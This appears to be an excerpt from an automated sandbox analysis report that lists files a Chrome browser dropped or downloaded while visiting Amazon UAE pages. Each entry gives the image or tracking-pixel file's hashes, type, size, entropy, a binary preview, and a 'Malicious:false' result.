                                                                                                                                                                                                                                                                SHA1:481BCCF46BFEF31227ACE73953960A2177B202CF
                                                                                                                                                                                                                                                                SHA-256:0B7D12BF279A942F5D966963A04549BA48DB2FE3A3F59FDF68CFD9C3D594A2F1
                                                                                                                                                                                                                                                                SHA-512:28CD7576E35324C1C37CEAE2EF42A1ED55D26A2366DC097A18C99C901B7CE15DDE7A9B5B628FFFC5608E99EE69C1A6D21B3FECFBBCDE8756BA936DEA9A9B2CBF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t....".................................................................!.1Aaq"2Q....BTr.......4RUb....#$D...Cc....................................................!1..2AR.."BQ.CSqab...............?...QE.QE..E.P..Q@.QE.QE..E.P..Q@.QE.T...q.i.......Q:.^....5>.w....5=ST...1......QS*..ec...F...56..1.S..%.nR.zH...\..(=$.....J..m....m.... S...s........)N.........0KG...A#x!..<....5l....T....~...'_.`.)[.zD...M...PSB.....20.......c.....u..E..y.|..}u....i\M.^....'.L........D%.^7.lw..6...'.G.3h.\}.{..0Q...k........!..L./..d..f:E...|}.~.37..t.w...8...1..$k..x.(...H.B...e..L..;.nE)./.N.C..Z.u$>.o..k..i....^.of..3.;...@j....=^...5ti.z...M....1h..E\0d.....=...6~E/.J....B1..V..Z}Y..2....U...L....CK...'Rp..S*...9......0..[TW.+...Y..-...W(AJx....\..G......r.(.......*s...D.a....;.v..(,..`..K.&.&.t.|R.0.X........F)
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 132x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):6700
                                                                                                                                                                                                                                                                Entropy (8bit):7.92027967336268
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:grHkRciXcnQvY/vlv5YcPK6vIMXWE+a1GTVqV/PSsrwen:grHExoQvOlvPK4ICW21GTo7Uen
                                                                                                                                                                                                                                                                MD5:F0124560CA09AD94C8428FA59BD2B2BA
                                                                                                                                                                                                                                                                SHA1:DCDD054472223E501658C6CAD7E74047AE03F07B
                                                                                                                                                                                                                                                                SHA-256:1603E9261325E960D3B69E8843F9897C6132A7034485A87A4C5817A459D32E91
                                                                                                                                                                                                                                                                SHA-512:FB5210C20D8A84D068DDF20E83A11506B13547367D608DC544349BE17140531E312036B60488316C00CA49A2DE3B71E4FDE241640A23D20602D131D529576DEF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...........................................................!..1.."AQaq.2..#B..Rr....Tb...&3....$CS..................................................!.1..Qq2Aa.."....3b...#r$BR................?..iJ.sp-.\P$.c....}LW..s`.k).....!f0.......`....9.0.7+jS?.s...J.....#IRiP.9;7.?.].../...J.~..3.jV..."=.(..J.J... ..D.A".Q&L.."bg1..+QBw.0..'.6..q.q...K.........JT.<.......3..+F/....A.&g.>..L.. ..u..%K.W5.!..eQ..>m.g...1=....!..w..r......% ..#IR.PQ~...9H9PL....bF..^.P.~u@...H.........9.J.J.:..$...#.=..r.5sV$A.B.7Ai...).%G.t...!Y8<JR....>."....U.\..V..Z.G.$.O.Dn....V.{T.Gh..L..$.*d.w.]c.]AV&... N..I..=.|<F..+.....l(....I";..G.w>1c4.]c.5.V/J..(!@m.I#$..'.....p...kR@d....i9.....L..X.5. .C..l..%...."$..|... T..4..s..Z.L.....g.z...`.......U.R]".j|.3......3).2p2|..mJ......g....mJP..)B....1...qJ@(Y...Ly.*..~.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 289x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):12780
                                                                                                                                                                                                                                                                Entropy (8bit):7.935769482533246
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:W1hqm130YmY7cHOMcpoQ5cuadorx37IYfJmTt2rYNGXBCS11rcMJELG4Nkutsnyz:Q3CMMcpoQWkh7B8exCYMNxtmu
                                                                                                                                                                                                                                                                MD5:BE8B900639EAA0BDAB2C5EA76DDE873C
                                                                                                                                                                                                                                                                SHA1:3BD443E330AA31FA1C8BD7AF28C65BC2CB6B4B4C
                                                                                                                                                                                                                                                                SHA-256:570DDDB1BD38443F1EBB73760A01FDB1A58FF2ABA2B8F5650352123D52446FA6
                                                                                                                                                                                                                                                                SHA-512:947444A8550F5B4DBDDB2B49A4E0FF21E8CA07294491AACC5B5AE2CE97661FA275754C7D12F929FAEE2F018C9775B3DB52AA9C54A1780C2D345235CF0B52860B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........!.."..........4........................................................................Y..0|.z} .E...<.....2.A.~...5.7....o=...'V..!........U.7L....C.nSi...!..`...0..|...*.nA...h...u......3.8........'>r.{.;]<)4...u.....pa....;.k"..H..dN.$*.4p...."e.O..K]P.H.H......`.=.....T.o=zW..r...}]......o#.z.l..>....z..Z.<.^.._..d..........I:..O.u...9....^.,.GD..=........[..4.qM.\]..W.-^k.\....zw..7.h..9Og.I.v..^.:ym.....j.F..3wE?;.......>.t.....?m&...-...N...&.p3..=.X.luC.OK.07.&..m.l...2.oL.p.3...B.3...Uc..s.x.......0*..s...n.Z .4C.3..*.$..%#.y..C,.\P...D..S...f..|D.......$:.J.z.|HX.$...B.R/..f..Vn. ..e%."S.(...?IF..n...x...S.=.F.A./}P0O.....@$....6H2.o..).^.U.]...Sl\.Vl[|..-.VA`A.q.W...A.O..>..)D{.O`/Q9m=.$..IN.C?H.XWd.b.v..vJ.......C.....I.$......PE.........`.T...C.....g..$..I&.(...H.x..].]...y..cT.%Q5I\.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):13665
                                                                                                                                                                                                                                                                Entropy (8bit):7.940335345715933
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:c7yDu8bEbIiRE/XFh0i1uWziCbIU0qT8SWlF:noIAi1ucIbSsF
                                                                                                                                                                                                                                                                MD5:5C0015408187C043FA8C9632F256E5E1
                                                                                                                                                                                                                                                                SHA1:372F507BD984ED32178F4CE1486D93072B891AC4
                                                                                                                                                                                                                                                                SHA-256:F53D182172709E8C171FFD28FCB892D6CA7DB0BD7D80832C7670F2D7CB8258BA
                                                                                                                                                                                                                                                                SHA-512:0576A81D60F3FFBFF1257A2E0FDFD07C6E2A9B94F8B77250BAB9ABBE9437AE59901DAB89C7DE10750C517543D11987F28A063B8B57B980B57D600EF5CE53662F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........4....................................................................[.m.yIR.R.R.R.R.R.R.R.R.R.R.R.R.R.R.R.R.R.R.R.W....>.Kqr.....4.....e....l.(W..Q...'.|....3.|.-5wML.so..h....H......>.d.;6..................R3T.<.....k..K|] .{rL..n]^..cq...sON.u..+.z.....]...{...W.......x.5..p.0...;...yi..f'...........n.@...............y.......Mp..R.[$.uqoS.;.s..........N9..\.Lw.z...C.N.....3..g..P.....o|...>.>~.x_m..V7.N(..Y..pK.|....................O<....I.....GG....0...5..;...Z.I.x.b,|..vS.."...P.SK_~..NK.............j3.....8B......}..p.3'.,..B.....|....y..4{9..s....8.<g..gt...f..=t.|.U..>O....c}` ........._......c...}ygxy.._i....}y.}.....5u..#..7T.....3f[.v..g.....G...3~....-#9.t.;.$...............d......).......I.8.r}5..i1...py..m.N....>.T}.6.(c.{..0..y..z...t.|...@........*..>..nK.|.b
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1500x600, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):76044
                                                                                                                                                                                                                                                                Entropy (8bit):7.885401691926046
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:xsQrxRRCKw65W0zlDvKbU2w+ZRJkZORGA5q8+Uwb7f2VCxm:xsuBCKB4iUvwiJ1Gy+Uwb7fO/
                                                                                                                                                                                                                                                                MD5:796DDD9242D15A87E699D2F5BD82A282
                                                                                                                                                                                                                                                                SHA1:C8C1DD9E09200645BB8E31D6C5521825046B67EE
                                                                                                                                                                                                                                                                SHA-256:FAF5A34430E05E3E5D0CEADEAEA5E990E5E88453C253380D435BDB7914532118
                                                                                                                                                                                                                                                                SHA-512:AE8DB35D5683DC0A758611BD5E39C4038AF63C48CDBFC83E2A670407842001DD06A975CD8EEF000F7D7387398332DCC641D3CAB4ED9DD1406283F00F4D80D386
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................X...............7......................................................................i`.....................................B...............R.....b..!N.?K.z...FC"..(.R.U.ft.-.2...Q.U.s...........................................b....B.....@PbP.......1)....w.-7{....S+....a..*.)r...R.a...@...................................................Pb.R..........A...z..[......@.V.ZY.r..e2.[.qT.K.9..;c..........................................!..@.).T6Y.vr...........1(.... (...nN.....r......Z....UrH.(.dR..pe..\.^...............................................~....;'9.08...:&...\....-..9......0...@R.P.b.R...j.^_.....Ql.QY.U..ZE...E.Q...R.r.z.;b........................................~[.o.....A.```q..?.3/.&...|p.(.(..........C........-s_..,...VT..-gJ...)FR..ee.r..o;a.......................................~`.o........,._..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2126
                                                                                                                                                                                                                                                                Entropy (8bit):7.727551160854069
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0rVDab2r5IGczX/BUktX8SzVwLc1qYgY6ssCecQOdj:Tyab2raXzZU2dBecxqbcQs
                                                                                                                                                                                                                                                                MD5:39D4307D1E3F7E1011831A12EAF630CF
                                                                                                                                                                                                                                                                SHA1:4C5D059985B30F4D92BE536FE827499D0B7C0455
                                                                                                                                                                                                                                                                SHA-256:75CBE731B4F76EC56A97BF842AD9961D459408B7A820BC2B08C36C5C1DCFBD7A
                                                                                                                                                                                                                                                                SHA-512:AFF0E1FB6804FECFBBE6BDFEDD8FB6823737445558A1ABA8E357610FEF017714278DCCAE93D77C6E9BA12322F3BA5C5CF212A7E03A5C3FC92D066486305C7AFF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..........z.....................................................!1Aa.."Q..2q.r........$BRb.....................................................?....................f...]+........f.+.................WEc...Y.bw].P7...w&1..x(....s.{.u.....N.D:7P7.:..nl>.(#..c..1..^.........^i.eL.&*,...6E(x.X..cO......$.....k..w...Zj.un...i.w....=f8....e....w...-.,>.%..{...s..I.I<I]..rWHyt..j....f...r.^...m:.8o0:....k. K%L..L.7.o}......q.b..T..(..""." *..... (...Y.nfIe..d,..:<.......g..JA=.rI..E.(|L....@p.bt........Ap.4>#p_..._..I.O.C..j..o..uj[<.5.G.4w:. k.q+X,x."^.]...........c..[.....wW{8y...U...#..A(3L$..?....5.3..G..i.1.<...Ylq.gQ.B..<..3N..|.......O..N........^.=0G.G.......jO.."".....v..!....Q.]#....^=.%.*`..Eh.$...Mv.X._.....R..f.....jwD?.1.{.&5....o.q{'.w...%..v.7k....N.vY.P..z;........kF.2Tq.W..O...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4609
                                                                                                                                                                                                                                                                Entropy (8bit):7.778924653979158
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TQMbb80J98CbVb7egx5vztB+NkvymEOWzQ7dE5sKhwZm+OM8QF3:lHn7e0vb+Nkv3dWkJisKum+R
                                                                                                                                                                                                                                                                MD5:2D98B4FFD376F3A10C7762AF8FA488B7
                                                                                                                                                                                                                                                                SHA1:67D564DAF90D716D3145B7BF084B0A85611150A2
                                                                                                                                                                                                                                                                SHA-256:FE690149BED5EAE0F2D75A581B869E78EB94F887A4A6ABE0107EDDEDCBDD39D9
                                                                                                                                                                                                                                                                SHA-512:3F51B652DD5DA2EDD190885EA057096DD34A9CBCD6C778CCBB7012B2DB08B0B1F4148275BC1CEA25E6E4FDDB57F30B91B5F1B3ECBE117B1BB603A797DDC4FB70
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3................................................................,......r..f.................... N.7.................".'.nKvk.\..k;7x.......<....{....[..6r_K...u..o..i.u^.o.=..w.*.....J.f..*R..E.6.E..k....)..2..>.R.......+CB..IJMc\g`.)..M#P.nz9.<.Gb.O..m......h."])J.Q*..JE.#..D].t.Q..^>]...F......._.4....h.l.O;....4........}.R. ....(s..])V.u/...c....<$M.m..K..,.>..~.....R.9._:L...o.&"....-.u..G.f.g.F.....R..I.$J^..&.....L'....I..w4.t..Mi[3.......&C.)fd.E......n.F....m$..;.t.o..Y........WL.f..WI..N.....L5[6Hg..7 ....N...w.._..1vP...../.N.T.......c?..o..9.W....?...+........................!2...01@. 3A."$BC...........OY....3.~i).U....c..g.R:...E.B&../.1I.....-...........?{T;G8.......)+!...#..q.........dg..I..uQ..@......m!j4..T4....W....&..r.<z.~J....\.w..t..;..P#.V.W..^u.:.w..].....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):4810
                                                                                                                                                                                                                                                                Entropy (8bit):7.775698101522166
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TLZzTyTbSIjBF8C/Ls5/K+j7RuKt+7FFF+EcnfpOvfBMPFKfbErNapVcPtHPi4v1:pmSeBzg5yW7p3zovfBMPFKAcylrv2mff
                                                                                                                                                                                                                                                                MD5:4147D56383C45598FDF7F96AB21508D6
                                                                                                                                                                                                                                                                SHA1:44F9432C4A492D49FF6F042551EFC3619CF310F6
                                                                                                                                                                                                                                                                SHA-256:450EDE7176FDA5976AFBFB7527F550E62461156A025BFFC3F21A0A0E873D1C5F
                                                                                                                                                                                                                                                                SHA-512:2D7885BB7E053245005353009EA77E59E1CD10A3A76FE6BB92E84D53609661D54CF8CD8C814434E72CB2A180B349D2830D7C978D417A46ACE0457F6346538ACD
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://m.media-amazon.com/images/I/41Zp3xaXvPL._SR240,220_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3................................................................`........................|.]..e....g.l_......M..Q.i.....3..H...z.+ ....@...y...:..b....u....#.."....i?.p^.....cR...e..il......W..\N.M..v...O..C9.D.`.%.L.t.....W...Y...m..hl.............~z.]..S.J@.Z3.RQ.S.i..eLw,.|lg)..q>..Cr&...k.....*...g....*....O...dk.v0\......~..x.5.w~.{...._.M..:......[.tc.WV...ka.\..a9d..i.r... ..z....=.!7..e...o........\.Vc=...._..t._..}]L.Y..=...|...V.q8.0....[..fl........#..l.8..U..Z.9.>o.{..C....A7..g....r...$..f..........'{(a...q...G.N.q"C]....QS{S6...$.9Q..,.C.....]e...........*7.t)G.z..^.E..QE..Qz..^................................/.........................4....!013."#2.CABQ`p................<\g...D....@q..t....@q..t.V.-t.|.8.#..{..X....Z....Nu]B..Y..y.>... .W+..a.|i..(.....|5).~~.x."tw..X"..X=
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fstaticb%26id%3DC37SFEY0GDXEZ5HDEVRN:0
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):50354
                                                                                                                                                                                                                                                                Entropy (8bit):7.969356113927722
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:2+BpaF79Y5UZ+C/5sjkCo0G3KD1apWtdAN+f:dBpaFAc+s5sj6aApWtdAN+f
                                                                                                                                                                                                                                                                MD5:CCEA032C567035C0AC54F72BB8AAE20D
                                                                                                                                                                                                                                                                SHA1:061C5C8B0C5E78A3BD58B162A1B048B576C864E9
                                                                                                                                                                                                                                                                SHA-256:9F5E5847FBCC02B660F73B9A3C9BFC5406EE2B4268A06E331418A88C46393754
                                                                                                                                                                                                                                                                SHA-512:CA16905E047A69133A8DA957BC92C9C2084FE042569789085BAD3ACFEE7E86343531088321F5AB684204428B5C6490BCBC0515CD040038F1FEAE6D722D8ED855
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986221_UAE_Budget_Store_AE_xsite_electronics_en_400x400_2X._CB644457597_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................................:.................................................................................\a.....]...p.m..6..yw..T.Z..J..v....O.65...@.............l=......c.Q......v^..r...a%.!.9..yw............i..V..\...<.8..........D.6.g`m..8O.................."HZ.mt.........yP.&{F...X_.........ec..C..+1............/.lw.;&.w.@.@..........;[...E..........*.......-J....k.....=..x.......P...x.#..:r........qR..aa...8.`..V..rJ......n7"{G..............mM.r.......GT....*..o..V..p$>1.}x.>y......J....j.gm......Sr?..#H....j....s..p........mz.rO(q}{...6.+8.9U<....ls.....Fu.[[...7.yG-..Q.....v.9.A5.,..:...,...nj...~.....?......>..|..~o.._.H........!1....6........e...`.y.....{.t.....o.."f..l:...`.K.25.7.................Q....2'~..=?x...X..?.,..s3..9.&o.+^.......p......7....xs....[...`...W.}.B..%.`.....3..6q...@.....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x250, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):39516
                                                                                                                                                                                                                                                                Entropy (8bit):7.972024116551709
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:xiqBv1n0WFDVzIk6a6XG8kPaq6Oxqp7YNLFFjCA9gfpn11KusA5q423q1:Dtn0YVzIla6W8Q64q9Y3FX9cp1ls+qxK
                                                                                                                                                                                                                                                                MD5:C67B003EAD831C68E0FF99D36099E1A3
                                                                                                                                                                                                                                                                SHA1:1513958AC2F0A22C952F6DE05178A1F3FBCE056C
                                                                                                                                                                                                                                                                SHA-256:D5A9CB812FE2A02197421420D1802E038CAF7EF079E262D003EC1F23E73D0E75
                                                                                                                                                                                                                                                                SHA-512:CF06A5C33B72F16CA1157A4CDB9B95C22C2174ED67D6BA10DAA25228F578A5D48338E80AB9F6C3464E59BA62FD6834BA196830D1F6BAE14F595484213F99A42E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF.............C....................................................................C.........................................................................,..............................................T..............................!.1."AQ.2a.#Bq.$R..b....%349Sr...67CTcsuvw.............................................I..........................!1A.."Qaq..2....BR....#b...4r.....$Sc.5s%3...............?..~...%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.*..p.L.FV......_.;%H#.gZ.x...-...S.....e.P....1. P..5.....6.T.R.y..../...m=....W.};.+..U......QX.d.+g.t......... ^&.....i.sJ.C. y.........m.%.'.|...X..OMm=..P.V......t..W....=.&R..Fq.......Y....fL...w...W.?...7.4....w.V.S...X..y.7.#....Ts.v.:wY......g..4Ceh...W.,.le.#*H.C..-R&.JpQ.A.R0..P1H.pz...P-o..s.{.p.1;.J....q{.o.Y......OL<Mn..C.2..N@..$,+.=..[..l.v.<Y.D}.f.~@M4LE...16.R.X~-..<.;i.q......0.8.d........^............i...`.......U.\[.X..P2.A.U..=.`.....c.z.Qc..........7....}..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):2504
                                                                                                                                                                                                                                                                Entropy (8bit):7.683203594367942
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:q0fVRckJT428RUXeB6hSTJpau2y2xFNaxGIkamZRUsKenYpP94jbyqg2:JNRcM1zhETjVsFkuamZRUsOP9Dqz
                                                                                                                                                                                                                                                                MD5:F90AA3D3F370FAF9FA196089CD86EEF9
                                                                                                                                                                                                                                                                SHA1:4B1D37029773AC6C057C774954EB0C83B647FE23
                                                                                                                                                                                                                                                                SHA-256:E59FC503FD4CC663A537D942E7FE4CC5D05BD505C22BEFA575A9B9263C08F30B
                                                                                                                                                                                                                                                                SHA-512:4896EC010B3F83A5D41FE00A3D7139C3ED868E7C9893326B01C6270557B153244E4362D32C084451B807F0F312D131C4B1D197195CAB996BC15C9578248C52B3
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/AHS_UAE/2024/UDS/GW/QC/Furniture/XCM_CUTTLE_1690813_3610032_186x116_1X_en_AE._SY116_CB582137121_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................t...."..........7......................................................................q`...=.E+.YC.............:.S.s!h;o'a?\..]...l.........g...t}.....}....R.z3$.o........=..Y...B.h....!Ku|.nZwT....;k.l ......V......SUR..12..~rW.)=,.Bd.....i.&..b.~../.z'&^L.J.....T&@......3,.................?...9............................#3..$@CS.....s!"14DPc...AB.........?..E.Y...t..e6KH.......h..'HX...fK.......- ....Gv......vV..k.~..g....a.Y..,q).OP......g........^.dL<..+,....1.y.[...oQ1(./.0.....(..........q.<..Az..+*...A..b.lwK.W9...YK.....O...Zae.D.ef."....."t.2yM.:..4......R.k&.......$...B..._mQ[.....r~bY.3qb,.O.[......bY..^.e^W...B...{b.3...G.=P.X..K.TYu.m...2....H.)..8..*.Io.....^....Wv.d.F>...J....'._).m-..G+....w....Q7......lWq.....rQ.4...b....V.Or.V...K+.DD2..D};_'..........kQ..."..E.h..~..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 87x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3084
                                                                                                                                                                                                                                                                Entropy (8bit):7.846744007256133
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0rSBU8WYWL5zH1ien51NV8LJr7CgIyTHsZqxoqDdad+ZmFuUWF1V/yGAm4:T4dEqO1dIRqDdaEKuUuA24
                                                                                                                                                                                                                                                                MD5:6BB72D6428F09405FB49B776DA466BB6
                                                                                                                                                                                                                                                                SHA1:27852A923010893FFCD1F56F97EEE87BF009F028
                                                                                                                                                                                                                                                                SHA-256:D9F11BC44492A6AD889A50BAB710116489BD9137481526B7503FE9BBC6D3ACD7
                                                                                                                                                                                                                                                                SHA-512:C8D588AB1D972475D3009D262BC11435D8B3770593B9E4A9B9878DA42AB219CD4D06AD8141BE32AC339F732B938DFAC81367D1BA71181080FAF20C359A26BE77
                                                                                                                                                                                                                                                                Malicious:false
